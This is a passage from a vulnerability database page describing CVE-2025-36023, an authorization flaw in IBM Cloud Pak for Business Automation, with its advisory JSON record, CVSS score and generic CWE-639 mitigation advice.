      "url": "https://www.vitalimages.com/customer-success-support-program/vital-images-software-security-updates"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9FWV-9WQG-4PM8

Vulnerability from github – Published: 2025-08-08 15:30 – Updated: 2025-08-08 15:30
VLAI
Details

IBM Cloud Pak for Business Automation 24.0.0 through 24.0.0 IF005 and 24.0.1 through 24.0.1 IF002 could allow an authenticated user to view sensitive user and system information due to an indirect object reference through a user-controlled key.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-36023"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-08T15:15:28Z",
    "severity": "MODERATE"
  },
  "details": "IBM Cloud Pak for Business Automation 24.0.0 through 24.0.0 IF005 and 24.0.1 through 24.0.1 IF002 could allow an authenticated user to view sensitive user and system information due to an indirect object reference through a user-controlled key.",
  "id": "GHSA-9fwv-9wqg-4pm8",
  "modified": "2025-08-08T15:30:33Z",
  "published": "2025-08-08T15:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36023"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7241570"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested.

Mitigation
Architecture and Design Implementation

Make sure that the key that is used in the lookup of a specific user's record is not controllable externally by the user or that any tampering can be detected.

Mitigation
Architecture and Design

Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering.

No CAPEC attack patterns related to this CWE.